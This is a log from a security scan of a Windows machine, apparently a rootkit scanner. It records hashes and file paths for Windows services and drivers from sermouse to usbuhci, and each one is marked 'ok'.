21:37:27.0548 0x1ac0 [ E5BA0B7353ADC5C95AB466D2E4DC89B1, 98F2A22ED892B2610C85EAAAB51DF25939599955A27611FCE9E68C3701CFD4EA ] sermouse C:\WINDOWS\System32\drivers\sermouse.sys
21:37:27.0563 0x1ac0 sermouse - ok
21:37:27.0563 0x1ac0 [ 043D7B39E693C610036BD56DF30EF440, 329D29CE1CB5F502B7DFCBE24878CA61EC56787A1B02195E19499701B194DE08 ] SessionEnv C:\WINDOWS\system32\sessenv.dll
21:37:27.0594 0x1ac0 SessionEnv - ok
21:37:27.0594 0x1ac0 [ 15CFCC4692DA8887B977CE5FC5181084, 31D86E122E35AB9E7275F2B0573EE98770BBE517ED3B9CCED97F4969C9A619F9 ] sfloppy C:\WINDOWS\System32\drivers\sfloppy.sys
21:37:27.0610 0x1ac0 sfloppy - ok
21:37:27.0626 0x1ac0 [ 87B083252816171A17F833CBCB7AA85E, 200AB93CEF384791DC9B04D2AF17877CA10595B2CEDF4B9505E367A2382C4AB7 ] SharedAccess C:\WINDOWS\System32\ipnathlp.dll
21:37:27.0657 0x1ac0 SharedAccess - ok
21:37:27.0673 0x1ac0 [ 4293E11951DEAAFB3924AB1DAB1FAC08, 644974816DDF690B26F369E48533D654A5B298BCA993EE53EACB5C00E52E5243 ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
21:37:27.0704 0x1ac0 ShellHWDetection - ok
21:37:27.0704 0x1ac0 [ 7CA2E9B6EDC87FCCA9C49D3D9BE62B65, 3FE1A2DD8581BF8D29EA2000424EB992BCA8E00986F107C22489D006F729D2E3 ] shpamsvc C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll
21:37:27.0719 0x1ac0 shpamsvc - ok
21:37:27.0719 0x1ac0 [ 2339F6B45E1D863B1D327F3AFD75A675, 03304ADC42EF6E8F671C8AA78A0D3E40408D870FBF2DA2B31A1727F86EF8F213 ] SiSRaid2 C:\WINDOWS\system32\drivers\SiSRaid2.sys
21:37:27.0735 0x1ac0 SiSRaid2 - ok
21:37:27.0735 0x1ac0 [ F520D50AD7266ED31D25DF4C8EA6BC2D, F68CF9EFB8319E59A8D9C24A36A198185DD79CBACD14510F5450F0024F0CD4D3 ] SiSRaid4 C:\WINDOWS\system32\drivers\sisraid4.sys
21:37:27.0751 0x1ac0 SiSRaid4 - ok
21:37:27.0751 0x1ac0 [ E6DA1192D36D2D29FF8387917C2D70A6, 6F6AB7A2E45D7E05F5ED0B08B1ED9FFA03BDBFAF5E80F8B9E2C4D6CF6F74B851 ] SkypeUpdate C:\Program Files (x86)\Skype\Updater\Updater.exe
21:37:27.0766 0x1ac0 SkypeUpdate - ok
21:37:27.0782 0x1ac0 [ C4C7316E98CFBC3F0CDAEE6968D7B9DC, 176AF4E9866E4FBB01DAB80A72BA0FE1A9AF6C55B3BF30032F5EB2F8D25EF5F3 ] SmbDrvI C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys
21:37:27.0782 0x1ac0 SmbDrvI - ok
21:37:27.0782 0x1ac0 [ A02AFDFB748D0A638A09DC4B5E47B240, E14BFA930A2F04012144B475DA9A565431F804DF0BA2B7595C43BB48EFBA4883 ] SMIDriver C:\WINDOWS\system32\DRIVERS\smi.sys
21:37:27.0798 0x1ac0 SMIDriver - ok
21:37:27.0798 0x1ac0 [ 70A2FD5F5B7B1A5E1146BE45E4DFB75D, 598824F06BBC2E37B9A6474411637C73233C8D2E13AE963C3229279A8519A9D3 ] smphost C:\WINDOWS\System32\smphost.dll
21:37:27.0813 0x1ac0 smphost - ok
21:37:27.0829 0x1ac0 [ CB001810FD0C56F1D57229D023A84AE8, E423B53EE3A3710D6F45CD14C8BA5EF8E955344C8477385D470E6687FC661A75 ] SmsRouter C:\WINDOWS\system32\SmsRouterSvc.dll
21:37:27.0860 0x1ac0 SmsRouter - ok
21:37:27.0876 0x1ac0 [ 9977AFF389C0C32DE419226564886E09, 453ABAB020E3ACD04A45BD05B224C182A47534C23023C4E1AD1903E5377B3CCF ] SNMPTRAP C:\WINDOWS\System32\snmptrap.exe
21:37:27.0891 0x1ac0 SNMPTRAP - ok
21:37:27.0907 0x1ac0 [ 2334ED0B61CAE7E7B1B454674206CDAC, 4EAA11805C2282E0306A381CF56E4B28D83C68BA1B401BFD512AE70C05C8A4CD ] spaceport C:\WINDOWS\system32\drivers\spaceport.sys
21:37:27.0923 0x1ac0 spaceport - ok
21:37:27.0923 0x1ac0 [ F3F0B8CAC1F3E6C3382EAFCE762475AD, 9F2EB373FB9216CDA71965979EE5E18F3AFDD26FF7E0C09DD7C3D880205C2554 ] SpatialGraphFilter C:\WINDOWS\system32\drivers\SpatialGraphFilter.sys
21:37:27.0938 0x1ac0 SpatialGraphFilter - ok
21:37:27.0938 0x1ac0 [ 83E82B0E292DCDE4C75B9241BF0FB300, 494D2FD4CD082CC416CA5FF1ABE06BDC65A769F371CF0E18AD25C380B45AEE32 ] SpbCx C:\WINDOWS\system32\drivers\SpbCx.sys
21:37:27.0938 0x1ac0 SpbCx - ok
21:37:27.0969 0x1ac0 [ 10CD42898C9E4849193E78A87337B2E9, 7C4FCB36EE1AF92C6962F14AE6DEF2CB154468EC3963DCDB9BDF8398C98B475B ] spectrum C:\WINDOWS\system32\spectrum.exe
21:37:28.0001 0x1ac0 spectrum - ok
21:37:28.0016 0x1ac0 [ 29D813B5D84BC2C26BBC607CAA57A675, 2C4D5F4E2F7B6580E22ABF67690B0D32CAF5063DEA79E6F57E565782973F3990 ] Spooler C:\WINDOWS\System32\spoolsv.exe
21:37:28.0063 0x1ac0 Spooler - ok
21:37:28.0173 0x1ac0 [ E910861720DE6EDFB5CC6158CE3C7E17, 526BA8EEB9EE5312FEC39753D728E05F49AD81132346A354C95D4D4938001E2B ] sppsvc C:\WINDOWS\system32\sppsvc.exe
21:37:28.0282 0x1ac0 sppsvc - ok
21:37:28.0298 0x1ac0 [ C8E447363427121B31958D18B5126BD1, 0C42B78384784365201AB6B16B8E0F9D82FE91F8747C73C0754B993E9F62807A ] SPUVCbv C:\WINDOWS\System32\Drivers\SPUVCbv64.sys
21:37:28.0391 0x1ac0 SPUVCbv - ok
21:37:28.0407 0x1ac0 [ 36EAC4FE629FC036632F13EC14788FD1, 6AEE37816306FE46FA99EADB23E98CE6A6674C11ED847F1F5575926E26B09F9A ] srv C:\WINDOWS\system32\DRIVERS\srv.sys
21:37:28.0438 0x1ac0 srv - ok
21:37:28.0469 0x1ac0 [ A84B05C7C2A233497BE1D518A662C326, 85B291B6783AD48F2111B46050311A553BE6D6A7C3D90861DC010FA65730D2B5 ] srv2 C:\WINDOWS\system32\DRIVERS\srv2.sys
21:37:28.0501 0x1ac0 srv2 - ok
21:37:28.0501 0x1ac0 [ 0351B28EEDFBD6C8CC69A7224A098CFA, D1D08D63F773CAEEA66585D090C073C0748AE96A2AAE8487E4B8BA54F7E59558 ] srvnet C:\WINDOWS\system32\DRIVERS\srvnet.sys
21:37:28.0532 0x1ac0 srvnet - ok
21:37:28.0548 0x1ac0 [ E95A6C339AE68515897B2E4C6B0842CA, 29DD7E83CD68432EAE4A7ED92CDA40AA52028F5FBB52152F0A1C752B572C2684 ] SSDPSRV C:\WINDOWS\System32\ssdpsrv.dll
21:37:28.0563 0x1ac0 SSDPSRV - ok
21:37:28.0579 0x1ac0 [ 5909EED02DB757A5B0738B2EBFACCA71, F069E61EBC86CEAA6EDC1F28106A0222B9637213510550FE370B46A3E0710917 ] SSSvc C:\Program Files (x86)\SmartSense\SSSvc.exe
21:37:28.0579 0x1ac0 SSSvc - ok
21:37:28.0594 0x1ac0 [ FBD45746B2EDEECA10CCA6A861F8049B, 34383B0A07A93E0FA89CA32CD45AC5061F73723B2A9E0BF4AF93A53F70F1678E ] SstpSvc C:\WINDOWS\system32\sstpsvc.dll
21:37:28.0610 0x1ac0 SstpSvc - ok
21:37:28.0704 0x1ac0 [ F1A5AC00B8CD7E28BBC8DD7E60D48B65, AC185DD46A8B63500DDE74C2446F6409B0B4612068C33B4B7C30E43F389908DF ] StateRepository C:\WINDOWS\system32\windows.staterepository.dll
21:37:28.0907 0x1ac0 StateRepository - ok
21:37:28.0923 0x1ac0 [ DF34F60699A8BF0E396ACB4CC8D7D0E7, 52BAB194D326777BB4213FB6151DFE929F16B0D081B2F27C0FA1A06B99AF2DE7 ] Stereo Service C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
21:37:28.0923 0x1ac0 Stereo Service - ok
21:37:28.0938 0x1ac0 [ D40C589F80EB1C511263D0547C0259AE, A0236F6BB515AE006CC4C9F40FCCE250407888757A3646BB4BCB59EF8EEF1311 ] stexstor C:\WINDOWS\system32\drivers\stexstor.sys
21:37:28.0938 0x1ac0 stexstor - ok
21:37:28.0954 0x1ac0 [ F83F43CD328E6CEEAAC27612F3EB1FF5, E3D35E5154CD228301806706E6EADCA36E9113EAF44BC06E3C43B2E902187326 ] stisvc C:\WINDOWS\System32\wiaservc.dll
21:37:28.0985 0x1ac0 stisvc - ok
21:37:29.0001 0x1ac0 [ 576A818562069B1E091CC719C143AED2, 48880CF4D33033E9A6024C2A0AD673AFBCE400C74574913F8E24717BA6BADE7C ] storahci C:\WINDOWS\system32\drivers\storahci.sys
21:37:29.0032 0x1ac0 storahci - ok
21:37:29.0032 0x1ac0 [ E5F703788DFA05411F1469E96838F438, A7E8D2DC23E23EA52B068C71D9387E69FF49798A27CE0243A994A2B1B09FA042 ] storflt C:\WINDOWS\system32\drivers\vmstorfl.sys
21:37:29.0048 0x1ac0 storflt - ok
21:37:29.0063 0x1ac0 [ 0D0128244FF55EAD3F878D3FE542DBA5, 4FCFA1B2113E07264A71A22298CA6E9FDC2AB722E0AE184A8F5656C18113A858 ] stornvme C:\WINDOWS\system32\drivers\stornvme.sys
21:37:29.0079 0x1ac0 stornvme - ok
21:37:29.0094 0x1ac0 [ 3A62FF78619258E6126C5C4B4CC82C8E, C72CC295680B35E0EEE5A5310E0241E2FFE0E540BFAA49C35C06AA882229C1CD ] storqosflt C:\WINDOWS\system32\drivers\storqosflt.sys
21:37:29.0126 0x1ac0 storqosflt - ok
21:37:29.0157 0x1ac0 [ 212CB512B785E218667CCA56C4BFD71D, 5FD4CFEE5AB2187D928632076E6AD5C2C53D66884479C4D34930DCFCA3CCEE34 ] StorSvc C:\WINDOWS\system32\storsvc.dll
21:37:29.0204 0x1ac0 StorSvc - ok
21:37:29.0219 0x1ac0 [ C6097966F8EA3B288070CDF7C3C8C3E8, D12C4AF3E54DCE1E5DC9C8AA0E83420F481DC0165A7F7845083A85BABC102D37 ] storufs C:\WINDOWS\system32\drivers\storufs.sys
21:37:29.0251 0x1ac0 storufs - ok
21:37:29.0251 0x1ac0 [ 3DC3B17E92DA02E36B4138733DF6C1AC, 398F20B6D6DAF6DA950C149F63F3B23864E1478119BFE53218C220CEADEC800D ] storvsc C:\WINDOWS\system32\drivers\storvsc.sys
21:37:29.0266 0x1ac0 storvsc - ok
21:37:29.0266 0x1ac0 [ D284AB2CA6C30317D142D38CE1F848BE, 4C9EAE174F5C673CA550C9382E85CE7DAF5DC9965495BAB09078B634A4CDD4FB ] svsvc C:\WINDOWS\system32\svsvc.dll
21:37:29.0298 0x1ac0 svsvc - ok
21:37:29.0298 0x1ac0 [ 2BC4D0EBC2467FE90302AE0AFAF23768, CF8BCC9CA1FBA8407FD044613A2497BEEC641DE463B076F0ED1FA7674C202ADE ] swenum C:\WINDOWS\System32\drivers\swenum.sys
21:37:29.0313 0x1ac0 swenum - ok
21:37:29.0329 0x1ac0 [ 13985DA558FBCBFD9108A2CACB5FE494, DD457A73E82147AA90C36D695A47E862FF90D96FB1E22760FAB5780F7C332A46 ] swprv C:\WINDOWS\System32\swprv.dll
21:37:29.0376 0x1ac0 swprv - ok
21:37:29.0376 0x1ac0 [ 572F81CF08972D53BAFFC2A110A2A586, D9AF8EBB31CE097849F93FC8C0F06178B2E1CA8C48D08BBDD85174CCD64A16D6 ] Synth3dVsc C:\WINDOWS\System32\drivers\Synth3dVsc.sys
21:37:29.0391 0x1ac0 Synth3dVsc - ok
21:37:29.0423 0x1ac0 [ 6F02CE00CF9B10E134FA659F9D1353E8, 26616F8CCA9E67066EC02B477BE838023AB1307D7D7DA26ED14C065E0F4AA5B2 ] SynTP C:\WINDOWS\system32\DRIVERS\SynTP.sys
21:37:29.0454 0x1ac0 SynTP - ok
21:37:29.0469 0x1ac0 [ 6CDAAEB36655B8963081C0E11BBBEE02, 3766074C780B95CA54A40FF075C08DEC3A46CECF42C1E047F3FA78C27783ED73 ] SynTPEnhService C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
21:37:29.0485 0x1ac0 SynTPEnhService - ok
21:37:29.0516 0x1ac0 [ 7C29BBF63178BB6788AD1C2B231150A5, 5114AC1260C5447D3B21C7C56D825C1E77FCE388C5630D0200C8256F69EFA6B4 ] SysMain C:\WINDOWS\system32\sysmain.dll
21:37:29.0579 0x1ac0 SysMain - ok
21:37:29.0594 0x1ac0 [ 97E0FD613D031EAA73E8AD259169AC22, E86E9B9C18AF2E79D7CF80B177A12D89418CDBD3CBB74307809DD0377408DB82 ] SystemEventsBroker C:\WINDOWS\System32\SystemEventsBrokerServer.dll
21:37:29.0626 0x1ac0 SystemEventsBroker - ok
21:37:29.0641 0x1ac0 [ 7750219DFABC38261575B6CEFBF84EC6, 50DF85E34AF7C1343281AD0EF34FD94AB0E279DA5C61976ABA0135B8F013C543 ] TabletInputService C:\WINDOWS\System32\TabSvc.dll
21:37:29.0657 0x1ac0 TabletInputService - ok
21:37:29.0673 0x1ac0 [ C1C6A802C2A9A57029D4347E251F4D18, 9F75B7F003C829FFDB2CDC98231D32FE988754D23873048FA4F6EB82ED1DCED4 ] TapiSrv C:\WINDOWS\System32\tapisrv.dll
21:37:29.0704 0x1ac0 TapiSrv - ok
21:37:29.0798 0x1ac0 [ D8D7A91B56DEF4A771A4414E9F07D138, 47712749937D945B15181F79D3FBD0151C021E0F4030E152CED88C96F1D072E6 ] Tcpip C:\WINDOWS\system32\drivers\tcpip.sys
21:37:29.0907 0x1ac0 Tcpip - ok
21:37:29.0954 0x1ac0 [ D8D7A91B56DEF4A771A4414E9F07D138, 47712749937D945B15181F79D3FBD0151C021E0F4030E152CED88C96F1D072E6 ] Tcpip6 C:\WINDOWS\system32\drivers\tcpip.sys
21:37:30.0016 0x1ac0 Tcpip6 - ok
21:37:30.0032 0x1ac0 [ 1C35A5C62D110346379C55E39A3D547C, 5BDBD593AB51ECA5A6B703E86F300E3B2B153E128BEB9A006ABD827AE726BD62 ] tcpipreg C:\WINDOWS\system32\drivers\tcpipreg.sys
21:37:30.0048 0x1ac0 tcpipreg - ok
21:37:30.0048 0x1ac0 [ 892AB2637603A5E9507C39E61101C3C3, 04B06BBEFC033BC9395123AE623E0BB3A241F05AA93EA2625CF2DBE1B3FFD1B6 ] tdx C:\WINDOWS\system32\DRIVERS\tdx.sys
21:37:30.0063 0x1ac0 tdx - ok
21:37:30.0329 0x1ac0 [ 44449A0EB8EBD8DCBC3ED4BB62BA3A5F, 168197015D1E5ED71775250084C224A1100E0F989A6D1CC4102004E5AAD74F3A ] TeamViewer C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
21:37:30.0595 0x1ac0 TeamViewer - ok
21:37:30.0610 0x1ac0 [ 96A35CDBA661D41C5A3914257CA1D200, 691ABBAA99C673E7D0B81D811BCC60976C3EC050F2B39B35B87A3BCC211F119A ] terminpt C:\WINDOWS\System32\drivers\terminpt.sys
21:37:30.0626 0x1ac0 terminpt - ok
21:37:30.0641 0x1ac0 [ 0B5C6D1683CDE89B3488326C60EA6EF2, 3B822CF005FA3002F27FF9BF39E7E133987230DA3481CFCF99F3B2B6B373A718 ] TermService C:\WINDOWS\System32\termsrv.dll
21:37:30.0688 0x1ac0 TermService - ok
21:37:30.0704 0x1ac0 [ 6568EF1B30101979107055B7E515EE58, A318082E5FDD79C9F85E8C00A78EBFA0EC44B1046976E85633DC7BD123DA38B9 ] Themes C:\WINDOWS\system32\themeservice.dll
21:37:30.0719 0x1ac0 Themes - ok
21:37:30.0735 0x1ac0 [ 2ABC11CFC2F03A919AF78A6E3E29C570, 54D91F89993A0FF090E2213EED92DE3659DCB693FBDA5932E31C6D6D7CFC8E80 ] TieringEngineService C:\WINDOWS\system32\TieringEngineService.exe
21:37:30.0782 0x1ac0 TieringEngineService - ok
21:37:30.0798 0x1ac0 [ 8949EED671F531E7B4A0FD7333CCC125, 2D55A1B4FD6843A11383BB71D0409943CA0C47350153F3EDAAA3CADFA4A3504A ] tiledatamodelsvc C:\WINDOWS\system32\tileobjserver.dll
21:37:30.0829 0x1ac0 tiledatamodelsvc - ok
21:37:30.0844 0x1ac0 [ E59D4F92FE11B47AB727C6D192CC977F, 1DA06663889A20A1B22DDF90E5C99A5668023C0B89E252F3E820C0D1964B1948 ] TimeBrokerSvc C:\WINDOWS\System32\TimeBrokerServer.dll
21:37:30.0860 0x1ac0 TimeBrokerSvc - ok
21:37:30.0876 0x1ac0 [ C83505A5CC15E39D6C6D7B3C20187E5C, A6AB47C041A7C99CB0D5EA706CC31B3D88DC83BAF5AF7E59F651F9D7068D94B2 ] TokenBroker C:\WINDOWS\System32\TokenBroker.dll
21:37:30.0938 0x1ac0 TokenBroker - ok
21:37:30.0938 0x1ac0 [ CCF673CD41815063EEC0DE517F5E1D27, D49B1465A51EF3C2229938752A785009E1ED8306A8DE399F63354379DB2F8BF9 ] TPHKLOAD C:\Program Files\LENOVO\HOTKEY\TPHKLOAD.exe
21:37:30.0954 0x1ac0 TPHKLOAD - ok
21:37:30.0954 0x1ac0 [ F76A92975340DAA99939DA297D677EA8, 51DA87E921BBA21BF39D7D9B691CEF8B1D2BCE2BBB0BA5B3C12B7E98CB5C702E ] TPM C:\WINDOWS\System32\drivers\tpm.sys
21:37:30.0969 0x1ac0 TPM - ok
21:37:30.0969 0x1ac0 [ 8ECC5302575EA6A27B04F5C258CE963F, E8B11D4D4F6790C2BD73909BD9C9C2BD37E74DD133D353770D957D1A0007FA0F ] TPPWRIF C:\WINDOWS\system32\drivers\Tppwr64v.sys
21:37:30.0985 0x1ac0 TPPWRIF - ok
21:37:30.0985 0x1ac0 [ 85E0D4431D61675A94EA99C9E1F56436, 9FA750703E04D20A62DBB0185CBDD70AFC4573FB65F86E61AAF7CF7A7D8E1E3E ] TrkWks C:\WINDOWS\System32\trkwks.dll
21:37:31.0001 0x1ac0 TrkWks - ok
21:37:31.0016 0x1ac0 [ F21A69013A67B372675F523262AC1E33, C3F910E375C0F4B7FFA6F6D755622FF6B0CAE36DF691C938DE177C94815FE3C8 ] TrustedInstaller C:\WINDOWS\servicing\TrustedInstaller.exe
21:37:31.0032 0x1ac0 TrustedInstaller - ok
21:37:31.0032 0x1ac0 [ 9856BCCD1CD5DE4D17E8DBBA7CEFC688, F4B532DCE6F4728092848FE7B2FC05AB921EC7B3FDD7E62AB40EE0029C008398 ] TsUsbFlt C:\WINDOWS\system32\drivers\tsusbflt.sys
21:37:31.0048 0x1ac0 TsUsbFlt - ok
21:37:31.0063 0x1ac0 [ 837AD2B941E721BCCEB7EF137E2DEE18, 84BE22616A50467B1957434C8BD19C8B0FC3B21CD77FFB8E16A09347CEAE0F4E ] TsUsbGD C:\WINDOWS\System32\drivers\TsUsbGD.sys
21:37:31.0063 0x1ac0 TsUsbGD - ok
21:37:31.0079 0x1ac0 [ 5DED9E34D133F4A363652CDB595D83F3, E8CFE5DF737D7C2A576B2D6D508977E1F6961122D541DF82AA581C7B3B1C384B ] tsusbhub C:\WINDOWS\system32\drivers\tsusbhub.sys
21:37:31.0094 0x1ac0 tsusbhub - ok
21:37:31.0094 0x1ac0 [ B3142C6118703E98EB0510CF7B43D0F2, 40FDCBAA2AD93026AD479BF8C1B4EE7A4E2E65590608B6B1C5DEB3C4716E5C03 ] tunnel C:\WINDOWS\System32\drivers\tunnel.sys
21:37:31.0126 0x1ac0 tunnel - ok
21:37:31.0141 0x1ac0 [ B097B77121A057AB6D70C647636978D4, 10F78A18AC898CDD0FA91D6FA29B8B45C6D8F6CE65B064C39256EB20FC6CD085 ] tzautoupdate C:\WINDOWS\system32\tzautoupdate.dll
21:37:31.0157 0x1ac0 tzautoupdate - ok
21:37:31.0157 0x1ac0 [ B4C846ABD462558D45CA578C855759C3, E0F0DD39A6C101C2209CA46EF2B5A5F4559843C9EE37CC08ED78D9E124A566D2 ] UASPStor C:\WINDOWS\System32\drivers\uaspstor.sys
21:37:31.0173 0x1ac0 UASPStor - ok
21:37:31.0173 0x1ac0 [ 5C2C0296D9EE7DC92A3F14642FBE656D, 94A7D549EC53C71095AD8DE4DB8F846D1DB3438FE2679E41DCAE62C34C0654DD ] UcmCx0101 C:\WINDOWS\system32\Drivers\UcmCx.sys
21:37:31.0188 0x1ac0 UcmCx0101 - ok
21:37:31.0204 0x1ac0 [ 8BB64E04CD97AD8C68543181D93E2AFC, FBA2FB9A9906721BAD42CDFFCCE0234AF3F72B83E2571E526801F19173B7C9CE ] UcmTcpciCx0101 C:\WINDOWS\system32\Drivers\UcmTcpciCx.sys
21:37:31.0220 0x1ac0 UcmTcpciCx0101 - ok
21:37:31.0220 0x1ac0 [ 5A7CE114C8DA9060F32633F81A5625E5, B49163951B380827ADBF13D336D5BDC1EEE90A70058019928A603AA1C24D8EB7 ] UcmUcsi C:\WINDOWS\System32\drivers\UcmUcsi.sys
21:37:31.0235 0x1ac0 UcmUcsi - ok
21:37:31.0235 0x1ac0 [ 5D4EAF3D0911338CB8FDB088386D6DCA, 1AC5B494C39570E66C4D4F867C6B8E37C174FB5D67C2865B07247122F60F8895 ] Ucx01000 C:\WINDOWS\system32\drivers\ucx01000.sys
21:37:31.0251 0x1ac0 Ucx01000 - ok
21:37:31.0251 0x1ac0 [ 384E1F0D84B465820416338E52FE7C2B, 8F82778332EA1199987BA569536CBED8FEAF5E9D920321B0C9DFCBDDD91EEA35 ] UdeCx C:\WINDOWS\system32\drivers\udecx.sys
21:37:31.0266 0x1ac0 UdeCx - ok
21:37:31.0282 0x1ac0 [ C82BE75239D412057C9E3DB1785680C6, AE712E40440F5725DA41C95C3E558B5E9ABB17C55B70297DD40D7D1BDA7CE45D ] udfs C:\WINDOWS\system32\DRIVERS\udfs.sys
21:37:31.0313 0x1ac0 udfs - ok
21:37:31.0313 0x1ac0 [ CCDF6EFF952BF3BF34DC17600F479397, 2A2009B3C4BD1A44F1C6E334CB0A7DD02443BCE1EB48837C1C70A2A04CC7C54A ] UEFI C:\WINDOWS\System32\drivers\UEFI.sys
21:37:31.0329 0x1ac0 UEFI - ok
21:37:31.0329 0x1ac0 [ 244A80A1A881E2B9303A0364AAB33F16, 3C58D5D5B1AF6AB598E6450817381E7D6B8700151B66DCDAD6002E73BD0EDF27 ] UevAgentDriver C:\WINDOWS\system32\drivers\UevAgentDriver.sys
21:37:31.0344 0x1ac0 UevAgentDriver - ok
21:37:31.0376 0x1ac0 [ 5F1DA3635C2F6B74EBFDEBFC747B63B5, 1B456B777C5099A67E405FEF20B5CBCB24C6FCE9ED7A5A421C6574618364FD47 ] UevAgentService C:\WINDOWS\system32\AgentService.exe
21:37:31.0423 0x1ac0 UevAgentService - ok
21:37:31.0438 0x1ac0 [ 00BEF71C45FD6B06E7525E7B31EFA88C, C0BDE8CB41BF9A34E395EA86756637E4CD6B88EF1C842364ECA639948D6CD59A ] Ufx01000 C:\WINDOWS\system32\drivers\ufx01000.sys
21:37:31.0438 0x1ac0 Ufx01000 - ok
21:37:31.0454 0x1ac0 [ 9450AB15C30CF7D1F23C8A42E778C3A2, E62455008ED5B7220AEE62E0F459A67E26FB2878349ABA5AAF0164C2E7A8C0E9 ] UfxChipidea C:\WINDOWS\System32\drivers\UfxChipidea.sys
21:37:31.0454 0x1ac0 UfxChipidea - ok
21:37:31.0470 0x1ac0 [ CEE12C7A689BDF448715024A7E0EB9C3, EC48E1469800E34A71C8A97A6F2F0B7C67385BCB8438844E6967DE0A82E39B94 ] ufxsynopsys C:\WINDOWS\System32\drivers\ufxsynopsys.sys
21:37:31.0470 0x1ac0 ufxsynopsys - ok
21:37:31.0485 0x1ac0 [ 5A2F610B31CC3FD23D3E20C1D5F1EF52, D470B7C1CAE066C2DCDBA47001913FB1A7C9CC5B200FB8324DB896B641C1A132 ] UI0Detect C:\WINDOWS\system32\UI0Detect.exe
21:37:31.0501 0x1ac0 UI0Detect - ok
21:37:31.0501 0x1ac0 [ F39ED750EDF5948FA8CD99D1F4EC9372, AE42AE50DE09F26D3CA4ACDCD5ECABD59D26926707030F0532A885266FE83EF9 ] umbus C:\WINDOWS\System32\drivers\umbus.sys
21:37:31.0516 0x1ac0 umbus - ok
21:37:31.0516 0x1ac0 [ 55984D4E64C2F8E4223542CBCC15EDEB, ECBC832FBBA6AFCAEDEBB2728FA4A6DDCF52A6421929E72CA29B61CDBED840DF ] UmPass C:\WINDOWS\System32\drivers\umpass.sys
21:37:31.0516 0x1ac0 UmPass - ok
21:37:31.0532 0x1ac0 [ FBEF4641E3E08A03CA84AF5C393CA86B, 9A14A0FB645AB6DD0B49F3A14FBF38FECC65796F2503324E93994113CC7AD52F ] UmRdpService C:\WINDOWS\System32\umrdp.dll
21:37:31.0548 0x1ac0 UmRdpService - ok
21:37:31.0579 0x1ac0 [ 3699DED879B2FF8FC1ECE91489109796, 05B1283256F6CA6AF3ABBE003360BF0BAB3400223092E7E9F0822120BF576BD2 ] UnistoreSvc C:\WINDOWS\System32\unistore.dll
21:37:31.0626 0x1ac0 UnistoreSvc - ok
21:37:31.0641 0x1ac0 [ BBB6BDBE5ADCE6F87F70623D5A1EC5BC, E8BD5804FF82417890A9D1A44096B174E81A8C7AD3059B1F0C62740E0B39D137 ] upnphost C:\WINDOWS\System32\upnphost.dll
21:37:31.0673 0x1ac0 upnphost - ok
21:37:31.0673 0x1ac0 [ 4D23214CB8B1C36B82061280EB8FDAB3, 387C01A7F9D8F89ED894EDF894AAAF8830DD7C90DF2F12A2CB4C4E9C7CB773BE ] UrsChipidea C:\WINDOWS\System32\drivers\urschipidea.sys
21:37:31.0673 0x1ac0 UrsChipidea - ok
21:37:31.0688 0x1ac0 [ 4329D880DB96B504F0DDC991A7374CCD, 1486BEF2C03ED281B24A17D3C18FEA2360E37A6B46D1A67D4690CD871B0A13DA ] UrsCx01000 C:\WINDOWS\system32\drivers\urscx01000.sys
21:37:31.0688 0x1ac0 UrsCx01000 - ok
21:37:31.0704 0x1ac0 [ 93FAD0AC5879F274FA248A49E3F3EA33, D936F408E23040B33F30AB3B43D8B8BB9F3CCF2549E821F4C47357987AFF386F ] UrsSynopsys C:\WINDOWS\System32\drivers\urssynopsys.sys
21:37:31.0704 0x1ac0 UrsSynopsys - ok
21:37:31.0704 0x1ac0 [ 6B09AA6A04C8261E787B6523229E7159, F97BED424E988AC6272D51025FD0D3180E89BAF0FFC83DAB609774D6269B353A ] usbccgp C:\WINDOWS\System32\drivers\usbccgp.sys
21:37:31.0720 0x1ac0 usbccgp - ok
21:37:31.0735 0x1ac0 [ ECE3AD18B4C22ED0C4AB1A2AD9AC32C8, 2062D400305075E886CF2C9D710A1C48B3F4AD48E7A75A77C66547357E96CB6E ] usbcir C:\WINDOWS\System32\drivers\usbcir.sys
21:37:31.0735 0x1ac0 usbcir - ok
21:37:31.0751 0x1ac0 [ F8BCB536866474C6D8008F4C69B778A1, F86F4330DE2F50D48559C1ED46168ADB8F6AA7C8FE3834FFE00085C1783C5750 ] usbehci C:\WINDOWS\System32\drivers\usbehci.sys
21:37:31.0751 0x1ac0 usbehci - ok
21:37:31.0766 0x1ac0 [ 1F723DA014062DBF3288B408A7611845, 0CCC9360259E6FBC510BBF69AE991A53A92516023AAC32C60A44BD3B43371C66 ] usbhub C:\WINDOWS\System32\drivers\usbhub.sys
21:37:31.0782 0x1ac0 usbhub - ok
21:37:31.0798 0x1ac0 [ C3F953D10C486D6A190AF548B3CF7DC9, B0FB45B3045D499A44853A9D4CFD39C9D92873FC0A62A3D76B6149E601DFECD8 ] USBHUB3 C:\WINDOWS\System32\drivers\UsbHub3.sys
21:37:31.0813 0x1ac0 USBHUB3 - ok
21:37:31.0829 0x1ac0 [ BE6ED98FD0D3FE5FB11762AD7CCD6C96, 54C6C929CA55EA6770474F7E230190FC7574C1FA52437B564B3B5FA4D6106D8A ] usbohci C:\WINDOWS\System32\drivers\usbohci.sys
21:37:31.0829 0x1ac0 usbohci - ok
21:37:31.0845 0x1ac0 [ CEE43CD5357DB8786CE6E2C430841AE4, 50F4629AE488A12D18EFFAD486D2F95545049AB1F6A3248BA44D2132EEC9A653 ] usbprint C:\WINDOWS\System32\drivers\usbprint.sys
21:37:31.0845 0x1ac0 usbprint - ok
21:37:31.0860 0x1ac0 [ 99F0738B320B7A8D11351A32F68AA5F1, DAA887C31E3F56245C15F04044C12B6E832FA7E837F4107376A6F8D8E3A99FEC ] usbser C:\WINDOWS\System32\drivers\usbser.sys
21:37:31.0860 0x1ac0 usbser - ok
21:37:31.0876 0x1ac0 [ 67E26F56CF7EACCBD9C9F75343A3D7C2, 210FA280897CCCB2458E9E683A8B4CA8A5DF9606B54F8B9CE05CA4AA6FD810AB ] USBSTOR C:\WINDOWS\System32\drivers\USBSTOR.SYS
21:37:31.0876 0x1ac0 USBSTOR - ok
21:37:31.0876 0x1ac0 [ 7BA802C9F73A84B75BB22538ADA495BE, 7D97E6305168C4CA86AB9BD5B63300156DFE97032251CB83DB1D4C4DB9C28DC8 ] usbuhci C:\WINDOWS\System32\drivers\usbuhci.sys
21:37:31.0891 0x1ac0 usbuhci - ok
